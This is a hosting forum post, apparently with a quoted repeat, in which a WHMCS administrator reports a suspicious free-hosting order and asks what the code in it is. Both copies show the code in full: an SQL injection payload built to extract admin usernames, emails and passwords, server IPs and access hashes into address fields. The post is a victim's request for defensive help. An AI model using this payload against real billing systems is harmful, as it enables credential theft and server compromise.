Hey Guys.
I have a Free Hosting account package on my WHMCS.
This is basically an account that Users can use to see if they will like our service. But it seems like the I'm attracting quite a lot of fake users and potential hackers.
I just received and Order under the name Hacker Hacker.
And had a suspicious code in the Client information field.
The code Said
AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins), AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)
AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0 d,accesshash SEPARATOR 0x0d) FROM tblservers), AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a, configoption1 SEPARATOR 0x0d) FROM tblproducts), hacked
United States
I traced the IP address to Indonesia so I marked it as fraud.
Does anyone know what this code is? A Simple Google search come up with a lot of Exploit codes.
I have .htaccess restricted the login page for anyone not on my IP address. I have also Password protected the Login directory and renamed it. So maybe that was a good thing that I had already done that prior to this.
but I'm curious to know if there is anything that still makes me vulnerable. I also care for the protection of other users on my Server.
My root login page for WHM is also IP restricted.
If anyone can tell me what I should do from here or if they know anything about the code please let me know.
Regards,
Petru
I have a Free Hosting account package on my WHMCS.
This is basically an account that Users can use to see if they will like our service. But it seems like the I'm attracting quite a lot of fake users and potential hackers.
I just received and Order under the name Hacker Hacker.
And had a suspicious code in the Client information field.
The code Said
Quote:
AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins), AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)
AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0 d,accesshash SEPARATOR 0x0d) FROM tblservers), AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a, configoption1 SEPARATOR 0x0d) FROM tblproducts), hacked
United States
Does anyone know what this code is? A Simple Google search come up with a lot of Exploit codes.
I have .htaccess restricted the login page for anyone not on my IP address. I have also Password protected the Login directory and renamed it. So maybe that was a good thing that I had already done that prior to this.
but I'm curious to know if there is anything that still makes me vulnerable. I also care for the protection of other users on my Server.
My root login page for WHM is also IP restricted.
If anyone can tell me what I should do from here or if they know anything about the code please let me know.
Regards,
Petru